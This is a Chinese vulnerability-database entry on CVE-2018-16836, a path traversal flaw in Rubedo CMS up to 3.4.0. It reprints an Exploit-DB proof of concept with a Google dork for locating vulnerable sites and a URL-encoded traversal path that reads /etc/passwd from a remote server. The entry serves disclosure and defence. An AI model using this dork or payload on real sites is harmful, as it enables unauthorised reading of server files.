Rubedo 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1306900 漏洞类型 路径遍历
发布时间 2018-09-12 更新时间 2020-02-10
CVE编号 CVE-2018-16836 CNNVD-ID CNNVD-201809-552
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/45385
https://cxsecurity.com/issue/WLB-2018090117
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201809-552
|漏洞详情
Rubedo是一套内容管理系统。theme是其中的一个主题组件。 Rubedo 3.4.0及之前版本中的theme组件存在路径遍历漏洞。攻击者可利用该漏洞读取并执行该服务根目录之外的任意文件。
|漏洞EXP
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
|参考资料

来源:github.com

链接:https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms